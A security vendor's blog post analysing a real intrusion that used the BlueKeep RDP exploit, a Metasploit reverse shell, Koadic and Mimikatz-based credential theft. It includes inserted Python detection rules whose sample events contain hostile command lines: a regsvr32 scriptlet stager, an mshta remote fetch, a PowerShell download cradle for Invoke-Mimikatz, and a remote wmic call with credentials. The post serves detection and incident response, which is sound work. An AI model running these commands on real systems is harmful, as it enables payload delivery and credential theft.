UPDATED December 1, 2021: This blog post was updated to reflect the official VMware Carbon Black Cloud Managed Detection and Response (MDR) offering. It showcases the type of real-time analysis from our world-class team of security experts that supports our MDR offering.
VMware Carbon Black’s Managed Detection and Response (MDR) team monitors customer environments to detect and alert on new and emerging threats. Recently, MDR detected malicious behavior that leveraged several attack vectors, including one of the first known uses of the newly released BlueKeep Windows exploit in the wild.
After identifying the malicious behavior, the MDR team collaborated with VMware Carbon Black’s Threat Analysis Unit (TAU) to dive deeper into the detected behaviors and determine that the BlueKeep exploit had been leveraged. In this post, MDR analysts are providing information on the exploit and how it was utilized in this attack, to provide an overview to security practitioners that may be investigating this threat.
After observing unusual Remote Desktop Protocol (RDP) activity on the host, MDR analysts began investigating the incident and observed several other suspicious behaviors, which included post-exploitation attack methods, network reconnaissance, and credential stealing.
This attack was targeted and progressed rapidly. MDR analysts immediately triaged the behavior and notified the client within two hours of receiving the initial alert. After supplying the preliminary incident notification, a full investigation was launched into the artifacts to provide additional insight into the behaviors and recommendations for remediation.
Exhibit 1: Attack Overview
Initially, Carbon Black Cloud Endpoint Standard’s native engine alerted on abnormal behaviors being spawned from trusted applications, which is indicative of living-off-the-land techniques. The alert triage tree below shows a complex chain of events with several concerning Tactics, Techniques, and Procedures (TTPs) involving fileless attacks, persistence, and abnormal behavior by system utilities.
Exhibit 2: Alert Triage Tree
Exhibit 3: Detected TTPs
After performing additional research into the behaviors present on the endpoint, MDR analysts determined that the host had been compromised utilizing several attack methods.
Upon further investigation, Carbon Black Cloud Endpoint Standard highlighted an event showing shellcode being loaded into the child process spoolsv.exe. This behavior indicated that the attacker was leveraging the BlueKeep exploit and correlates with the Rapid7 Metasploit module. It should be noted that this type of indicator is also observed with the EternalBlue exploit.
Exhibit 4: BlueKeep Behavior
The application C:\windows\system32\spoolsv.exe attempted to create an intra-process thread by calling the function “CreateThread”.
WHAT IS BLUEKEEP, AND WHAT’S THE BIG DEAL?
BlueKeep (CVE-2019-0708) is a vulnerability in the Windows Remote Desktop Protocol (RDP) service on 64-bit versions of Windows 7 and 2008 R2. Like EternalBlue, this vulnerability is classified as “wormable”: an unauthenticated attacker can run arbitrary malicious code and move laterally through the victim’s network. The exploit has the potential to give an unauthorized attacker carte blanche access to a victim’s environment.
BlueKeep was recently released as a Metasploit module; that proof of concept requires an attacker to know specific details about the target network. It is unclear whether the attackers in this incident had prior knowledge of the target organization or whether they modified the original proof of concept.
After the BlueKeep behavior was documented, network connections were observed over port 4444. This port has been associated with several malicious behaviors, such as crypto mining, and is commonly known as Metasploit’s default TCP port. Metasploit is a tool designed for penetration testers; however, it has been adopted by attackers to exploit vulnerabilities in an effort to gain access to a target system or network. Below are indicators showing that the shellcode loaded via the BlueKeep exploit successfully established a reverse TCP connection:
Exhibit 5: Metasploit Network Activity
The application C:\windows\system32\spoolsv.exe established a TCP/4444 connection to [REDACTED] (VT / ADB) : 4444 ([REDACTED] (VT / ADB) ) from [REDACTED] (VT / ADB) : 60087. The device was on the corporate network using the public address [REDACTED] (VT / ADB) ([REDACTED].Local, located in [REDACTED]). The operation was successful.
Exhibit 6: Reverse TCP Connection
The application C:\windows\system32\spoolsv.exe invoked the application C:\windows\system32\cmd.exe .
Afterwards, we observed RDP-related connections and activity. The image below depicts events related to rdpclip.exe, which is a strong indicator that the attacker was able to establish an RDP session with the target machine.
Exhibit 7: RDP Authentication
Once the exploit has been successfully executed, the attacker has unauthorized and unrestricted access to execute commands on the compromised system.
After gaining access to the environment, the attacker performed several reconnaissance related activities to obtain additional information about the user and network. Typically, as in this case, attackers leverage native OS tools (like net.exe) to obtain this information.
Here we can see that net.exe was used to create a user account on the domain controller. Creating an account on a domain controller grants additional access levels.
Exhibit 8: User Account Creation
The attacker also employed whoami to determine which user account they were on and ipconfig to obtain information about the network configuration.
Exhibit 9: Reconnaissance Behaviors
Creating new user accounts and escalating account privileges are common attack techniques for gaining additional access and persistence on a host or network.
This attack also utilized Koadic, a post-exploitation COM Command & Control rootkit developed by zerosum0x0. This post-exploitation tool works similarly to Meterpreter and PowerShell Empire, allowing pivoting and privilege escalation within a victim’s environment. It leverages Living Off the Land (LoL) techniques, abusing legitimate processes such as mshta, regsvr32, and rundll32 to retrieve and execute malicious payloads on the target system.
CB Defense alerted after observing some common host-based indicators for Koadic. (NOTE: Ports can vary on the host-based indicators).
Exhibit 10: Initial Koadic Indicator
/s /u /n /i:http://XXX.XXX.XXX.XXX:8080/[random characters]; scrobj.dll
Exhibit 11: Scrobj.dll Koadic Indicator
dynwrapx.dll was also observed being dropped by rundll32.exe:
Exhibit 12: Dynwrapx.dll File Drop
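The three Koadic indicators in Exhibits 10 to 12 are all recognisable from a process launch or a file write, which makes them a good fit for simple rules. The following is an added example, not code from the original post or from the Koadic project; the event fields, the rule names, the 192.0.2.10 stager address and the sample command lines are constructed for the example.

```python
"""Added example: command-line and file-drop indicators for the Koadic
living-off-the-land stagers described above (regsvr32 + scrobj.dll, mshta
with a remote URL, rundll32 dropping dynwrapx.dll).  Event fields and sample
values are constructed for this example, not taken from the incident."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class CmdRule:
    name: str
    image: str            # basename of the process image the rule applies to
    pattern: re.Pattern   # searched against the full command line


CMD_RULES = [
    # regsvr32 /s /u /n /i:<url> scrobj.dll -- the scriptlet stager in Exhibit 10.
    CmdRule("koadic_regsvr32_scrobj_stager", "regsvr32.exe",
            re.compile(r"/i:https?://\S+.*\bscrobj\.dll", re.I)),
    # mshta fetching and running an HTA/script straight from a URL.
    CmdRule("mshta_remote_url", "mshta.exe",
            re.compile(r"\bhttps?://", re.I)),
]

# Files whose creation by a given LOLBin is a known Koadic artefact (Exhibit 12).
DROP_RULES = {("rundll32.exe", "dynwrapx.dll"): "koadic_dynwrapx_drop"}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def match_process(image, cmdline):
    """Names of the command-line rules a process launch trips (empty if none)."""
    img = basename(image)
    return [r.name for r in CMD_RULES if r.image == img and r.pattern.search(cmdline)]


def match_file_drop(image, path):
    """Name of the file-drop rule tripped by `image` writing `path`, or None."""
    return DROP_RULES.get((basename(image), basename(path)))


def triage(events):
    """Run both rule sets over a list of constructed event dicts."""
    hits = []
    for ev in events:
        if ev["type"] == "process":
            hits += [(ev["id"], name) for name in match_process(ev["image"], ev["cmdline"])]
        elif ev["type"] == "file_write":
            name = match_file_drop(ev["image"], ev["path"])
            if name:
                hits.append((ev["id"], name))
    return hits


# Constructed samples; 192.0.2.10 is a documentation address standing in for
# the stager host, and the URL path is random-looking like the real one.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32.exe /s /u /n /i:http://192.0.2.10:8080/Vq3kQ scrobj.dll"},
    {"id": 2, "type": "process", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},   # benign install
    {"id": 3, "type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://192.0.2.10:8080/Vq3kQ"},
    {"id": 4, "type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Users\alice\AppData\Local\Temp\setup.hta"},    # local HTA
    {"id": 5, "type": "file_write", "image": r"C:\Windows\System32\rundll32.exe",
     "path": r"C:\Users\alice\AppData\Local\Temp\dynwrapx.dll"},
    {"id": 6, "type": "file_write", "image": r"C:\Windows\System32\rundll32.exe",
     "path": r"C:\Users\alice\AppData\Local\Temp\printer.log"},
]

if __name__ == "__main__":
    for event_id, rule in triage(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```

Both rule sets key on the process image as well as the command line or path, so a vendor installer registering a local DLL with regsvr32, or mshta opening a local .hta, does not fire; as the post notes, the port in the stager URL varies, so the regsvr32 rule deliberately matches any remote /i: URL rather than port 8080.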
This type of attack method enlists legitimate, trusted applications to carry out malicious actions or deliver malicious payloads, as seen in the behavior displayed above. The technique is used to evade detection by traditional antivirus platforms that rely on signature-based detections.
MDR analysts observed and alerted on this behavior as it progressed through the kill chain. After the initial exploitation of the BlueKeep vulnerability, reconnaissance behavior, account creation, and reverse TCP connections were observed. Finally, the attackers were observed trying to escalate privileges, allowing for lateral movement within the environment.
Privilege escalation and credential dumping were observed using LazyKatz, an automated tool developed to extract credentials from remote targets. LazyKatz is useful to attackers because it attempts to bypass traditional antivirus (AV) and/or application allowlisting software.
In another example of living-off-the-land attack techniques, the iexplore.exe process was used to drop the executable on disk from an internal IP address, which then invoked the untrusted LazyKatz process.
Exhibit 13: LazyKatz File Drop
LazyKatz also employs psexec.exe, a lightweight telnet replacement that lets you execute processes on other systems. Once connected to a remote computer, the username and password credentials are exposed and the contents are written to a .txt file.
Exhibit 14: LazyKatz Output
C:\Windows\system32\cmd.exe /C wmic /node:10.1.208.208 /user:[redacted] /password:[redacted][redacted] os get status 2>&1 | findstr /R /I /C:".*" > output.txt
PowerShell.exe is then leveraged to call the DownloadString method, connect to a suspicious domain, download Mimikatz, and then invoke it to dump credentials.
Exhibit 15: Mimikatz
Next, a script that leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz entirely in memory was executed. This allows an attacker to dump credentials without ever writing the Mimikatz binary to disk.
Finally, a program called Powerline is used. Powerline is a tool that allows remote calls to PowerShell scripts from the command line without calling PowerShell directly. This is a newly created tool used to bypass application allowlisting tactics.
In this case Powerline is used to execute the Invoke-Mimikatz script. Powerline attempted to generate a memory dump using “MiniDumpWriteDump”; CB Defense identified this behavior as malicious and terminated the application:
Exhibit 16: Powerline
The application C:\[redacted]\powerline.exe attempted to generate a memory dump of “C:\Windows\System32\lsass.exe”, by calling the function “MiniDumpWriteDump”. The operation was blocked and the application terminated by Cb Defense.
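Exhibits 14 to 16 show three distinct credential-access signals: a remote WMIC call with a username and password on the command line, a PowerShell download cradle fetching Invoke-Mimikatz, and a MiniDumpWriteDump call aimed at lsass.exe. The following is an added example, not code from the original post or from Carbon Black, of triage logic that separates the three and assigns a verdict; the event shapes, the allow/alert/block policy, the empty LSASS allowlist, the 10.0.2.15 address and the example.invalid host are assumptions constructed for the example.

```python
"""Added example: triage logic for the credential-access indicators above
(remote WMI execution with embedded credentials, PowerShell downloading
Invoke-Mimikatz, and MiniDumpWriteDump against lsass.exe).  Event shapes and
samples are constructed for this example and are not the incident's records."""
import re

# Remote WMIC call carrying a username and password on the command line (Exhibit 14).
WMIC_REMOTE_CREDS = re.compile(r"\bwmic\b.*?/node:\S+.*?/user:\S+.*?/password:", re.I)
# Download cradle followed by the Mimikatz loader (Exhibit 15).
DOWNLOAD_CRADLE = re.compile(r"DownloadString\s*\(", re.I)
MIMIKATZ = re.compile(r"invoke-mimikatz|\bmimikatz\b", re.I)

LSASS = "lsass.exe"
# Images permitted to take an LSASS minidump.  Hypothetical and empty on
# purpose: nothing in a normal estate should be dumping LSASS.
LSASS_DUMP_ALLOWLIST = frozenset()


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess(event):
    """Return (verdict, reason); verdict is 'allow', 'alert' or 'block'."""
    if event["type"] == "process":
        cmd = event["cmdline"]
        if WMIC_REMOTE_CREDS.search(cmd):
            return ("alert", "remote WMI execution with credentials on the command line")
        if DOWNLOAD_CRADLE.search(cmd) and MIMIKATZ.search(cmd):
            return ("block", "PowerShell download cradle fetching Mimikatz")
        if DOWNLOAD_CRADLE.search(cmd):
            return ("alert", "PowerShell download cradle")
        return ("allow", "no credential-access indicator")
    if event["type"] == "api_call" and event["function"] == "MiniDumpWriteDump":
        if basename(event["target"]) == LSASS:
            if basename(event["image"]) in LSASS_DUMP_ALLOWLIST:
                return ("alert", "allow-listed image dumped LSASS; review")
            return ("block", "MiniDumpWriteDump targeting lsass.exe")
        return ("allow", "minidump of a non-LSASS process")
    return ("allow", "event type not covered")


SAMPLE_EVENTS = [  # constructed; 10.0.2.15, CORP\svc and example.invalid are placeholders
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /C wmic /node:10.0.2.15 /user:CORP\svc '
                r'/password:REDACTED os get status 2>&1 | findstr /R /I /C:".*" > output.txt'},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/Invoke-Mimikatz.ps1'); "
                "Invoke-Mimikatz\""},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c \"Get-Process | Sort-Object CPU\""},
    {"type": "api_call", "image": r"C:\Users\alice\Downloads\powerline.exe",
     "function": "MiniDumpWriteDump", "target": r"C:\Windows\System32\lsass.exe"},
    {"type": "api_call", "image": r"C:\Program Files\Vendor\crashreporter.exe",
     "function": "MiniDumpWriteDump", "target": r"C:\Program Files\Vendor\app.exe"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        verdict, reason = assess(ev)
        print(f"{verdict:5} {basename(ev['image']):18} {reason}")
```

The LSASS rule keys on the target of the API call rather than on the calling image, which is what made the block in Exhibit 16 possible against a tool the product had never seen: it does not matter whether the caller is Powerline, a renamed copy of it, or a future tool, because a minidump of lsass.exe is the action being stopped. A crash reporter dumping its own application stays allowed.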
This attack leveraged several different attack methods and highlights how threat actors and their tactics are advancing. With the ever-evolving threat landscape providing new and exciting exploits, such as BlueKeep, it’s important that your security team understands how to detect and alert on these malicious behaviors.
Traditional antivirus programs may be unable to provide the same type of protection against attacks that utilize Living Off the Land Binaries or advanced tactics. As attack techniques progress, so must your security solutions. VMware Carbon Black Cloud coupled with MDR’s managed alert triaging service can help protect your organization against advanced threats.
The security community will likely continue to see RDP exploits in the threat landscape as new RDP vulnerabilities continue to be discovered. A reported 700,000 systems are still vulnerable to BlueKeep, having not applied the CVE-2019-0708 patch. System owners must proactively patch against these RDP vulnerabilities. The following policies can be implemented in CB Defense to help protect against campaigns like the one observed here:
rapid7. “rapid7/metasploit-framework.” GitHub, September 23, 2019. https://github.com/rapid7/metasploit-framework/blob/b668e1fa5b8e148b0985b80e44de0a07985d8d5e/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb.
Bratescu, Stefan, Cristin Sirbu, and Razvan Ionescu. “How to Exploit BlueKeep Vulnerability with Metasploit.” Pentest-Tools.com, September 9, 2019. https://pentest-tools.com/blog/bluekeep-exploit-metasploit/#installing-bluekeep.
Gatlan, Sergiu. “Public BlueKeep Exploit Module Released by MetaSploit.” BleepingComputer, September 6, 2019. https://www.bleepingcomputer.com/news/security/public-bluekeep-exploit-module-released-by-metasploit.
Kvitchko, Yori, Tom Hessman, Daniel Pendolino, and Ed Skoudis. “Metasploit Cheat Sheet.” SANS Institute. Accessed October 23, 2019. https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf.
Popov, Yuri. “DynamicWrapperX v1.0.” Script-coding.com. Accessed October 10, 2019. https://www.script-coding.com/dynwrapx_eng.html.
Fehrman, Brian. “Introducing: Powerline!” Webcast slides (WEBCAST_061517_slides_PowerLine), October 27, 2017. https://www.dropbox.com/s/bvxt8v7d72tdpbr/WEBCAST_061517_slides_PowerLine.pptx?dl=0#.
Cimpanu, Catalin. “Metasploit Team Releases BlueKeep Exploit.” ZDNet, September 6, 2019. https://www.zdnet.com/article/metasploit-team-releases-bluekeep-exploit/.